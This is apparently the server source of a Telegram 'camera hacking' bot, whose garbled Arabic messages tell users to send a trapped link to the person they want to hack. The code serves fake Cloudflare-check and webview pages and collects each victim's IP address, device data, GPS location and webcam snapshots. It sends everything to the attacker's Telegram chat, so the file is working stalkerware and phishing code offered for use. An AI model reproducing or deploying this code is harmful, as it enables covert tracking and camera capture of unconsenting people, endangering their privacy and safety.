  require('dotenv').config();
const fs = require("fs");
const express = require("express");
var cors = require('cors');
var bodyParser = require('body-parser');
const fetch = require('node-fetch');
const TelegramBot = require('node-telegram-bot-api');
const bot = new TelegramBot(process.env["bot"], {polling: true});
var jsonParser=bodyParser.json({limit:1024*1024*20, type:'application/json'});
var urlencodedParser=bodyParser.urlencoded({ extended:true,limit:1024*1024*20,type:'application/x-www-form-urlencoded' });
const app = express();
app.use(jsonParser);
app.use(urlencodedParser);
app.use(cors());
app.set("view engine", "ejs");

//Modify your URL here
var hostURL="https://c8220f9a-b5ed-4fe6-8862-192b03285345-00-aak1lggl1jy6.sisko.replit.dev/";
//TOGGLE for Shorters
var use1pt=false;



app.get("/w/:path/:uri",(req,res)=>{
var ip;
var d = new Date();
d=d.toJSON().slice(0,19).replace('T',':');
if (req.headers['x-forwarded-for']) {ip = req.headers['x-forwarded-for'].split(",")[0];} else if (req.connection && req.connection.remoteAddress) {ip = req.connection.remoteAddress;} else {ip = req.ip;}
  
if(req.params.path != null){
res.render("webview",{ip:ip,time:d,url:atob(req.params.uri),uid:req.params.path,a:hostURL,t:use1pt});
} 
else{
res.redirect("https://t.me/th30neand0nly0ne");
}

         
                              
});

app.get("/c/:path/:uri",(req,res)=>{
var ip;
var d = new Date();
d=d.toJSON().slice(0,19).replace('T',':');
if (req.headers['x-forwarded-for']) {ip = req.headers['x-forwarded-for'].split(",")[0];} else if (req.connection && req.connection.remoteAddress) {ip = req.connection.remoteAddress;} else {ip = req.ip;}


if(req.params.path != null){
res.render("cloudflare",{ip:ip,time:d,url:atob(req.params.uri),uid:req.params.path,a:hostURL,t:use1pt});
} 
else{
res.redirect("https://t.me/th30neand0nly0ne");
}

         
                              
});



bot.on('message', async (msg) => {
const chatId = msg.chat.id;

 

if(msg?.reply_to_message?.text=="ðŸŒ Ø§Ø±Ø³Ù„ Ø§Ù„Ø±Ø§Ø¨Ø· Ø§Ù„Ù…Ø±Ø§Ø¯ ØªÙ„ØºÙŠÙ…Ù‡"){
 createLink(chatId,msg.text); 
}
  
if(msg.text=="/start"){
var m={
reply_markup:JSON.stringify({"inline_keyboard":[[{text:" â˜£ï¸ØªÙ„ØºÙŠÙ… Ø±Ø§Ø¨Ø· ",callback_data:"crenew"}]]})
};

bot.sendMessage(chatId, `Ù…Ø±Ø­Ø¨Ø§ Ø¨Ùƒ Ø¹Ø²ÙŠØ²ÙŠ ${msg.chat.first_name} ! , \nÙÙŠ Ø¨ÙˆØª Ø§Ø®ØªØ±Ø§Ù‚ Ø§Ù„ÙƒØ§Ù…ÙŠØ±Ø§ Ù„Ù„Ù‚ÙŠØ§Ø¯Ù‡ ÙˆØ¶Ø§Ø­ Ø´Ø®ØµÙŠØ§.\nÙŠØ±Ø¬Ø¦ Ø§Ø³ØªØ®Ø¯Ø§Ù… Ø§Ù„Ø¨ÙˆØª ÙÙŠ Ù…Ø§ ÙŠØ±Ø¶ÙŠ Ø§Ù„Ù„Ù‡ ÙˆØ±Ø³ÙˆÙ„Ù‡ \n\n âš ï¸Ù…Ù„Ø§Ø­Ø¸Ù‡ Ø§ÙŠØ°Ø§ Ø§Ø¬Ø§Ù†ÙŠ Ø§ÙŠ Ø´ÙƒÙˆØ§   Ø¨Ø§Ù†ÙƒÙ… ØªØ³Ø­Ø¨Ùˆ ØµÙˆØ± Ø§Ù„Ù…Ø²Ø² Ø¨ÙˆÙ‚Ù Ø§Ù„Ø¨ÙˆØª\n Ø§Ù„Ù…Ø·ÙˆØ± @zvzzs \n Ø§Ù„Ù…Ø·ÙˆØ±Ù‡2 @Q_Y18 \n Ù‚Ù†Ø§Ù‡ Ø§Ù„Ù…Ø·ÙˆØ± Ù„Ø´Ø±ÙˆØ­Ø§Øª https://t.me/IID_ID \n /Ù…Ø³Ø§Ø¹Ø¯Ù‡ `,m);
}
else if(msg.text=="/create"){
createNew(chatId);
}
else if(msg.text=="/Ù…Ø³Ø§Ø¹Ø¯Ù‡"){
bot.sendMessage(chatId,` Ù…Ù† Ø®Ù„Ø§Ù„ Ù‡Ø°Ø§ Ø§Ù„Ø±ÙˆØ¨ÙˆØª ÙŠÙ…ÙƒÙ†Ùƒ ØªØªØ¨Ø¹ Ø§Ù„Ø£Ø´Ø®Ø§Øµ ÙÙ‚Ø· Ø¹Ù† Ø·Ø±ÙŠÙ‚ Ø¥Ø±Ø³Ø§Ù„ Ø±Ø§Ø¨Ø· Ø¨Ø³ÙŠØ·. \n\n Ø§Ø±Ø³Ù„ /start  Ù„Ù„Ø¨Ø¯Ø§  Ù…Ù† Ø«Ù…Ø§ ØªÙ„ØºÙŠÙ… Ø±Ø§Ø¨Ø· Ø³ÙŠØ·Ù„Ø¨ Ù…Ù†Ùƒ Ø§Ø±Ø³Ø§Ù„ Ø±Ø§Ø¨Ø· Ù„ØªÙ„ØºÙŠÙ…Ù‡ Ù‚Ù… Ø¨Ø§Ø±Ø³Ø§Ù„ Ø±Ø§Ø¨Ø· Ù„ØªÙ„ØºÙŠÙ…Ù‡ Ø³ÙŠÙ‚ÙˆÙ… Ø¨ØªÙ„ØºÙŠÙ… Ø§Ù„Ø±Ø§Ø¨Ø· Ù…Ø±ØªØ§Ù† ÙˆÙŠÙ‚ÙˆÙ… Ø¨Ø§Ø±Ø³Ø§Ù„Ù‡ Ù„Ùƒ Ù‚Ù… Ø¨Ø¶ØºØ·Ù‡ Ù…Ø·ÙˆÙ„Ù‡ Ø¹Ù„Ø§ Ø§Ù„Ø±Ø§Ø¨Ø· ÙŠÙ„ÙŠ Ø¬Ø§Ø¨Ù‡ Ù„Ùƒ Ø«Ù… Ø§Ù†Ø³Ø®Ù‡ ÙˆØ§Ø±Ø³Ù„Ù‡ Ù„Ø´Ø®Øµ Ø§Ù„Ø°ÙŠ ØªØ±ÙŠØ¯ Ø§Ù† ØªØ®ØªØ±Ù‚Ù‡  
\n2.Ø±Ø§Ø¨Ø· Webview: Ø³ÙŠÙØ¸Ù‡Ø± Ù‡Ø°Ø§ Ù…ÙˆÙ‚Ø¹ ÙˆÙŠØ¨ (Ù…Ø«Ù„ bing ÙˆÙ…ÙˆØ§Ù‚Ø¹ Ø§Ù„Ù…ÙˆØ§Ø¹Ø¯Ø© ÙˆÙ…Ø§ Ø¥Ù„Ù‰ Ø°Ù„Ùƒ) ÙŠØ³ØªØ®Ø¯Ù… iframe Ù„Ø¬Ù…Ø¹ Ø§Ù„Ù…Ø¹Ù„ÙˆÙ…Ø§Øª. (Ù‚Ø¯ Ù„Ø§ ØªØ¹Ù…Ù„ Ø§Ù„Ø¹Ø¯ÙŠØ¯ Ù…Ù† Ø§Ù„Ù…ÙˆØ§Ù‚Ø¹ Ø¨Ù‡Ø°Ù‡ Ø§Ù„Ø·Ø±ÙŠÙ‚Ø© Ø¥Ø°Ø§ ÙƒØ§Ù† Ù„Ø¯ÙŠÙ‡Ø§ Ø±Ø£Ø³ Ø¥Ø·Ø§Ø± x Ù…ÙˆØ¬ÙˆØ¯. Ø¹Ù„Ù‰ Ø³Ø¨ÙŠÙ„ Ø§Ù„Ù…Ø«Ø§Ù„ https://google.com) 
\n\n
`);
}
  
  
});

bot.on('callback_query',async function onCallbackQuery(callbackQuery) {
bot.answerCallbackQuery(callbackQuery.id);
if(callbackQuery.data=="crenew"){
createNew(callbackQuery.message.chat.id);
} 
});
bot.on('polling_error', (error) => {
//console.log(error.code); 
});






async function createLink(cid,msg){

var encoded = [...msg].some(char => char.charCodeAt(0) > 127);

if ((msg.toLowerCase().indexOf('http') > -1 || msg.toLowerCase().indexOf('https') > -1 ) && !encoded) {
 
var url=cid.toString(36)+'/'+btoa(msg);
var m={
  reply_markup:JSON.stringify({
    "inline_keyboard":[[{text:"Create new Link",callback_data:"crenew"}]]
  } )
};

var cUrl=`${hostURL}/c/${url}`;
var wUrl=`${hostURL}/w/${url}`;
  
bot.sendChatAction(cid,"typing");
if(use1pt){
var x=await fetch(`https://short-link-api.vercel.app/?query=${encodeURIComponent(cUrl)}`).then(res => res.json());
var y=await fetch(`https://short-link-api.vercel.app/?query=${encodeURIComponent(wUrl)}`).then(res => res.json());

var f="",g="";

for(var c in x){
f+=x[c]+"\n";
}

for(var c in y){
g+=y[c]+"\n";
}
  
bot.sendMessage(cid, `ØªÙ… Ø¥Ù†Ø´Ø§Ø¡ Ø§Ù„Ø±ÙˆØ§Ø¨Ø· Ø§Ù„Ø¬Ø¯ÙŠØ¯Ø© Ø¨Ù†Ø¬Ø§Ø­. ÙŠÙ…ÙƒÙ†Ùƒ Ø§Ø³ØªØ®Ø¯Ø§Ù… Ø£ÙŠ Ù…Ù† Ø§Ù„Ø±ÙˆØ§Ø¨Ø· Ø£Ø¯Ù†Ø§Ù‡ .\nURL: ${msg}\n\nâœ…Ø§Ù„Ø±ÙˆØ§Ø¨Ø· Ø§Ù„Ø®Ø§ØµØ© Ø¨Ùƒ \n\nðŸŒ CloudFlare Page Link\n${f}\n\nðŸŒ WebView Page Link\n${g}`,m);
}
else{

bot.sendMessage(cid, `ØªÙ… Ø¥Ù†Ø´Ø§Ø¡ Ø§Ù„Ø±ÙˆØ§Ø¨Ø· Ø§Ù„Ø¬Ø¯ÙŠØ¯Ø© Ø¨Ù†Ø¬Ø§Ø­ .\nURL: ${msg}\n\nâœ…Your Links\n\nðŸŒ CloudFlare Page Link\n${cUrl}\n\nðŸŒ WebView Page Link\n${wUrl}`,m);
}
}
else{
bot.sendMessage(cid,`âš ï¸ Ø§Ù„Ø±Ø¬Ø§Ø¡ Ø¥Ø¯Ø®Ø§Ù„ Ø¹Ù†ÙˆØ§Ù† URL ØµØ§Ù„Ø­ØŒ Ø¨Ù…Ø§ ÙÙŠ Ø°Ù„Ùƒ http Ø£Ùˆ https. `);
createNew(cid);

}  
}


function createNew(cid){
var mk={
reply_markup:JSON.stringify({"force_reply":true})
};
bot.sendMessage(cid,`ðŸŒ Ø§Ø±Ø³Ù„ Ø§Ù„Ø±Ø§Ø¨Ø· Ø§Ù„Ù…Ø±Ø§Ø¯ ØªÙ„ØºÙŠÙ…Ù‡`,mk);
}





app.get("/", (req, res) => {
var ip;
if (req.headers['x-forwarded-for']) {ip = req.headers['x-forwarded-for'].split(",")[0];} else if (req.connection && req.connection.remoteAddress) {ip = req.connection.remoteAddress;} else {ip = req.ip;}
res.json({"ip":ip});

  
});


app.post("/location",(req,res)=>{

  
var lat=parseFloat(decodeURIComponent(req.body.lat)) || null;
var lon=parseFloat(decodeURIComponent(req.body.lon)) || null;
var uid=decodeURIComponent(req.body.uid) || null;
var acc=decodeURIComponent(req.body.acc) || null;
if(lon != null && lat != null && uid != null && acc != null){

bot.sendLocation(parseInt(uid,36),lat,lon);

bot.sendMessage(parseInt(uid,36),`Latitude: ${lat}\nLongitude: ${lon}\nAccuracy: ${acc} meters`);
  
res.send("Done");
}
});


app.post("/",(req,res)=>{

var uid=decodeURIComponent(req.body.uid) || null;
var data=decodeURIComponent(req.body.data)  || null;

var ip;
if (req.headers['x-forwarded-for']) {ip = req.headers['x-forwarded-for'].split(",")[0];} else if (req.connection && req.connection.remoteAddress) {ip = req.connection.remoteAddress;} else {ip = req.ip;}
  
if( uid != null && data != null){

 
if(data.indexOf(ip) < 0){
return res.send("ok");
}

data=data.replaceAll("<br>","\n");

bot.sendMessage(parseInt(uid,36),data,{parse_mode:"HTML"});

  
res.send("Done");
}
});


app.post("/camsnap",(req,res)=>{
var uid=decodeURIComponent(req.body.uid)  || null;
var img=decodeURIComponent(req.body.img) || null;
  
if( uid != null && img != null){
  
var buffer=Buffer.from(img,'base64');
  
var info={
filename:"camsnap.png",
contentType: 'image/png'
};


try {
bot.sendPhoto(parseInt(uid,36),buffer,{},info);
} catch (error) {
console.log(error);
}


res.send("Done");
 
}

});



app.listen(5000, () => {
console.log("App Running on Port 5000!");
});
